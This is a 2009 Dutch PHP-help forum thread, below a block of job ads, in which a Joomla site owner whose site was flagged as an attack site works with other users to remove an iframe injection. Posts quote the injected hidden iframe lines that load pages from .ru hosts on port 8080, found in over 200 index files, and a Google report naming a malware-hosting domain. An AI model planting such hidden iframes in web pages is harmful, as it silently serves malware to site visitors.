Aanvalssite

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Product Developer (M/F), Fulltime 40 h/week

A global Plantbased revolution – that is our dream. Maximising the protein transition – that is our mission. Producing and developing sustainable and delicious products – that is what we do. Ojah is a fast growing company with a mission and has the ambition to be the world leader in its field. To support this growth we are hiring new colleagues. People that would like to make a difference and dare to dream big. With currently a 150 colleagues proudly working on our exceptional products. Working in a dynamic surrounding that runs full speed ahead. We need you! Product Developer

Bekijk vacature »

Senior Cobol Applicatieontwikkelaar

Bedrijfsomschrijving De IV- organisatie van de Belastingdienst is verantwoordelijk voor en verzorgt de ICT- voorzieningen. Het merendeel van de applicaties wordt op dit moment door de IV- organisatie zelf ontwikkeld, onderhouden en beheerd in het eigen data center. Naast de zorg voor continuïteit op de massale heffing- en inningsprocessen die plaatsvinden binnen een degelijke, stabiele omgeving, wordt er tevens volop gewerkt aan modernisering van het IV- landschap. Dit gebeurt deels intern door gebruik te maken van de expertise die intern aanwezig is, maar ook door het aantrekken van (kant-en-klaar) oplossingen en expertise uit de markt. Functieomschrijving In de applicatie ETM

Bekijk vacature »

Node.js developer

Functie Onder begeleiding van 3 accountmanagers waarvan er 1 binnen jouw expertise je aanspreekpunt zal zijn ga je aan de slag bij diverse opdrachtgevers. Hij of zij helpt je bij het vinden van een passende en uitdagende opdracht. Hierin houden ze uiteraard rekening met jouw situatie, ervaring en (technische) ambities. De opdrachten duren gemiddeld één tot 2 jaar. Hierdoor kun je je ook echt vastbijten in een project en als consultant impact maken. Naast de opdracht ben je regelmatig met je collega’s van de IT-afdeling om bijvoorbeeld onderlinge kennis te delen, of nieuwe trends te bespreken. Ook worden er regelmatig

Bekijk vacature »

Junior Back end developer PHP, Symfony

Functie Wij hebben onlangs onze eerste collega’s aangenomen, waardoor ons development team momenteel uit 4 personen bestaat. We bouwen onze software op basis van een PHP-framework (wat op zichzelf een Symfony framework is). Qua ontwikkeling focussen wij ons op 3 focus velden; – API-ontwikkeling/ Component Creatie – Implementatie – Framework ontwikkeling; het toevoegen van nieuwe functionaliteit of interne microservices Onze senior software engineer focust zich momenteel op de laatste twee punten, maar wij komen handen te kort op het eerste veld. Daarom zijn wij op zoek naar een enthousiaste junior software engineer die graag de kneepjes van het vak wil

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET developer start jij in een development team met twee ervaren software ontwikkelaars. Jouw persoonlijke ontwikkeling is voor ons erg belangrijk en jij gaat dan ook meelopen met onze Senior .NET ontwikkelaar die jou met zijn kennis en ervaring een goede begeleiding kan aanbieden. Als team zijn jullie verantwoordelijk voor het schrijven van software voor onze toonaangevende Automatiseringssystemen. Jij gaat aan de slag met de onderhoud van de kernsoftware, ondersteund de software van derden door het gebruik van onze webservices en als team zijn jullie verantwoordelijk voor het ontwikkelen van onze backend oplossingen. Wij maken op dit

Bekijk vacature »

Network Engineer (f/m/d) in Heidelberg

Network Engineer (f/m/d) The IT Services team operates and supports the IT infrastructure and services at EMBL headquarters in Heidelberg and at the laboratory’s sites in Barcelona and Rome. As part of IT Services, the Network team is responsible for managing and developing the network infrastructure in our data centres, on campus, and to our external network providers. As a leading scientific institution with highly data-intensive research, extensive data flows at and between the laboratory’s six sites and to the Internet, EMBL is connected to national and international scientific networks using state-of-the-art technologies from vendors including Cisco, Extreme Networks and

Bekijk vacature »

Fullstack developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en zou jij graag bij een platte maar informele organisatie werken? Voor een mooi softwarebedrijf in omgeving Alblasserdam zijn wij op zoek naar versterking op de afdeling Software Development! Als Fullstack react.js developer wordt je bij dit bedrijf onderdeel van de volledige ontwikkeling van requirement tot oplevering! Jouw focus ligt op de front end en alles wat daarbij komt kijken. Je gaat ontwerpen, ontwikkelen, testen en valideren. Je zult voornamelijk werken met React.js en Typescript. Maar ook Javascript, HTML en CSS komen aanbod. Daarnaast zal je ook regelmatig met de back

Bekijk vacature »

.Net developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als .Net Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling. Mede hierdoor zij wij dit jaar Microsoft Partner of the year geworden. Sogetisten staan klaar voor elkaar, hebben lol met elkaar en daarmee behalen we de mooiste resultaten! Werken bij Sogeti

Bekijk vacature »

Experienced Lead Java Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Delft Vacature ID: 13301 Introductie We are seeking a Lead Java Developer for our team in the area of Delft. You will develop an application used exclusively by the engineers and geologists for site characterizations, which imports raw field and laboratory measurements for further processing, integration, ground modelling, and geotechnical analysis and reporting. The client/server application is entirely written in Java, and the server is hosted in the Amazon cloud, utilizing frameworks such as Spring and Hibernate, and connected to an MS SQL Server RDS instance. There is a trend towards using more

Bekijk vacature »

Front-end developer gezocht

Functie Je komt in een team met ambitieuze developers die de passie voor Front-End met jou delen. Samen ga je aan de slag met leuke en leerzame opdrachten. Het team heeft een eigen budget en financiën en zij bepalen zelf hoe dat besteed en investeert wordt. Je gebruikt tools als JavaScript, Node.js, React, Angular, Typescript en Vue.js wanneer je werkt aan de opdrachten. Daarnaast zul je veel leren van je collega’s en gezamenlijk een leuke tijd doorbrengen tijdens activiteiten zoals wintersport, hackatons en conferentiebezoeken. Je krijgt niet alleen de mogelijkheid Front-End te ontwikkelen, maar ook vooral jezelf. Dit kan behaald

Bekijk vacature »

Senior front-end developer (React)

Functie Momenteel zijn ze op zoek naar een ervaren front-end developer. Als senior werk je nauw samen met 5 collega developers. Een klein scrum team dus, met korte lijnen waardoor jouw ideeën snel tot uitvoering gebracht kunnen worden. De huidige applicaties worden veelal ontwikkeld met o.a. React, Redux, TypeScript. Ze zijn echt op zoek naar een kartrekker in het team. Naast het meedenken over, opzetten en uitvoeren van bijvoorbeeld de architectuur of toepassing van nieuwe technieken krijg je ook veel tijd om de meer junior (front-end) developers te begeleiden. Hierin nemen ze graag de tijd om mensen de ruimte te

Bekijk vacature »

Back-end Developer Java

Dit ga je doen Het (door)ontwikkelen van een zelfgebouwde applicatie in Java, Spring Framework, SQL, HTML, CSS en Javascript; End-to-end beheer m.b.t. de applicatie en koppelen van applicaties binnen het landschap; Ontwikkelen van rapportages voor de interne organisatie; Ontwikkelen van aanvullende functionaliteiten m.b.t. de applicatie; Uitvoeren van testen en code reviews. Hier ga je werken Binnen deze organisatie kom je te werken op de afdeling die medische gegevens verzamelt vanuit het hele land. Denk hierbij aan vertrouwelijke persoonsgegevens. Het team verwerkt al deze data met als doel het waarborgen en verbeteren van de kwaliteit van de zorg in heel Nederland.

Bekijk vacature »

Belastingdienst - Freelance Applicatieontwikkelaar

Startdatum: 01.06.2023 Richttarief: €65,00 - €75,00 Duur van de opdracht: 6 maanden Uren per week: 36 Taal: Nederlands vereist! Gelieve in het Nederlands te solliciteren. Hybride. Kantoordagen in Utrecht, incidenteel in Apeldoorn Functieomschrijving: De afdeling IV – Generieke Voorzieningen – Interactie Online is onderdeel van de keten Interactie. De missie van de keten is: “het faciliteren van de interactie met alle burgers, bedrijven en hun vertegenwoordigers om hen in staat te stellen aan hun fiscale verplichtingen te voldoen en aanspraak te maken op hun rechten.” De afdeling Interactie Online heeft een belangrijke bijdrage binnen deze keten. Dit door het ontwikkelen

Bekijk vacature »

C# .NET Developer

Dit ga je doen Je richt je op het doorontwikkelen en herstructureren van het platform; Je werkt in teamverband en zelfstandig aan uitdagende projecten voor verschillende klanten; Softwareontwikkeling middels C# .NET; Je staat in contact met verschillende opdrachtgevers om de klantwensen te bespreken en deze vervolgens te ontwikkelen; Verbeteren van bedrijfsprocessen; Implementaties. Hier ga je werken Als .NET Developer kom je te werken in de regio van Lelystad bij een organisatie die met toonaangevende klanten uit heel Nederland samen werkt. De producten en diensten van de organisatie bereiken miljoenen Nederlanders. Hierbij komt een grote hoeveelheid informatie kijken en deze moet

Bekijk vacature »

.NET developer

Functie Als .NET ontwikkelaar start jij in een multidisciplinair team met 7 ontwikkelaars. Dit team is verdeeld onder Front-end ontwikkelaars en backend developers. De backend developers werken voornamelijk aan desktop applicaties in combinatie met backend systemen. Hier ga jij dus ook mee aan de slag! Hierbij wordt voornamelijk gebruik gemaakt van C# .NET, WPF, UWP, XAML en MVVM. WPF, UWP, .NET Core, Azure Devops en Entity Framework. WPF en UWP worden dan ook voornamelijk gebruikt voor de user interface van de desktop applicatie. Het development team is dan ook erg gedreven m.b.t. het ontwikkelen van vooruitstrevende en innovatieve horeca automatiseringsoplossingen.

Bekijk vacature »

Pagina: 1 2 volgende »

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:30:00
Quote Anchor link
als ik naar mijn site ga met firefox krijg ik een melding van gerapporteerde aanvalssite, waarschijnlijk krijgen andere bezoekers dit dus ook, hoe krijg ik dit voor iedereen weg?

De site: http://www.vvhunsingo.nl/

PHP hulp

PHP hulp

22/11/2024 07:33:18

Jan Koehoorn

Jan Koehoorn

12/07/2009 12:32:00
Quote Anchor link
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:36:00
Quote Anchor link
het is dus een joomla site en ik had deze regel
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<iframe src="http://u9i.ru:8080/index.php" width=173 height=131 style="visibility: hidden"></iframe>

weggehaald omdat ik anders een foutmelding kreeg:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90

Timen kut

Timen kut

12/07/2009 12:39:00
Quote Anchor link
http://blog.combell.com/2009/06/21/combell-tech-opgelet-voor-hackers-via-iframe-injection/

i frame injection.. heb ik ook gehad.. Is heel irritant. En als je eenmaal geinfecteerd bent, kan het dus ook overschieten naar andere FTP's waar je op inlogt, dus ook op die van klanten!

edit: Google recommends:http://www.stopbadware.org/home/security
Gewijzigd op 01/01/1970 01:00:00 door Timen kut

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 12:51:00
Quote Anchor link
er staat:
Gebruik uw virusscanner om het virus te neutraliseren

Hoe doe ik dit?

Timen kut

Timen kut

12/07/2009 12:52:00
Quote Anchor link
Je virus scannen gebruiken om het virus te neutraliseren meestal....

Het virus staat namelijk LOKAAL en niet alleen op je server..

Wat ik heb gedaan is : backup maken van mn hele FTP, FTP HELEMAAL leeggegooid, daarna Adaware en avast scans gedaan, en dan alles weer op de FTP gezet...

Midas

Midas

12/07/2009 14:44:00
Quote Anchor link
Volgens mij is die .ru site inmiddels offline.

Naam Loos

Naam Loos

12/07/2009 14:58:00
Quote Anchor link
Midas schreef op 12.07.2009 14:44:

Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..

Midas

Midas

12/07/2009 15:00:00
Quote Anchor link
Bramboos schreef op 12.07.2009 14:58:
Midas schreef op 12.07.2009 14:44:

Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Hij is ook wel online, alleen je wordt doorgeschakeld naar de host.

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 17:00:00
Quote Anchor link
ik heb mn site gescand met Kaspersky maar hij vind niets, wat nu?

Als ik na de melding van aanvalssite verder klik naar mn site, zie ik dat hij er ook niet meer normaal uitziet

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 19:01:00
Quote Anchor link
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla

Roeltje M

Roeltje M

12/07/2009 20:00:00
Quote Anchor link
Alles uploaden, met dreamweaver zoeken/vervangen op map: (de hoofdmap) en dan dat stukje vervangen in niets. Tadaa :)

Afra ca

Afra ca

12/07/2009 20:32:00
Quote Anchor link
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.

Wouter De Schuyter

Wouter De Schuyter

12/07/2009 20:56:00
Quote Anchor link
Jan Koehoorn schreef op 12.07.2009 12:32:
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?

Wat is de huidige status van vvhunsingo.nl?

Deze site is als verdacht aangemerkt - het bezoeken van deze site kan uw computer beschadigen.

Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.

Wat is er gebeurd toen Google deze site bezocht?

Van de 10 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 5 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-07-12. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-11.

Schadelijke software wordt op 1 domein(en) gehost, waaronder a3l.ru/.

This site was hosted on 1 network(s) including AS31477 (DUOCAST).

Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?

Het lijkt erop dat vvhunsingo.nl in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.

JanWillem117 schreef op 12.07.2009 19:01:
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>

Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200

Actual Search And Replace! Gebruik ik vaak..
Gewijzigd op 01/01/1970 01:00:00 door Wouter De Schuyter

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 21:00:00
Quote Anchor link
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.

Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg

Roel -

Roel -

12/07/2009 21:53:00
Quote Anchor link
Ik heb er pas nog last van gehad, een week geleden ofzo. Je moet ook op je error pagina's letten, hij infecteert namelijk bestanden met "index" en je error pagina's.

Diagnostische pagina voor vvhunsingo.nl - Google

Afra ca

Afra ca

12/07/2009 22:01:00
Quote Anchor link
JanWillem117 schreef op 12.07.2009 21:00:
Afra schreef op 12.07.2009 20:32:

Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg

Gebruik versie 5.4.3 van notepad++ (5.4.4 gaf wat vervelende problemen in windows 7 bij mij) en je kan prima search + replace doen:

http://img339.imageshack.us/img339/4296/capturej.png

Filip Smets

Filip Smets

12/07/2009 23:26:00
Quote Anchor link
Database Error: Unable to connect to the database:Could not connect to MySQL

Meer krijg ik niet te zien hoor.

JanWillem BlaBla

JanWillem BlaBla

12/07/2009 23:33:00
Quote Anchor link
Dat is nu weer opgelost maar in Firefox ziet de site er bij mij niet uit zoals het hoort en in Opera wel.(Ook in IE ziet het er bij mij normaal uit)

Hoe is dit bij jullie?
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla

- SanThe -

- SanThe -

13/07/2009 08:05:00
Quote Anchor link
Bij het openen van bovenstaande link liep mijn computer geheel vast.

JanWillem BlaBla

JanWillem BlaBla

13/07/2009 19:18:00
Quote Anchor link
Als ik nu naar mn site ga in IE krijg ik een melding dat Adobe Acrobat wil openen, hoe kan dat? Ook krijg ik een melding van een virus, ik had mn site helemaal gescand

Pagina: 1 2 volgende »

Overzicht Reageren

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.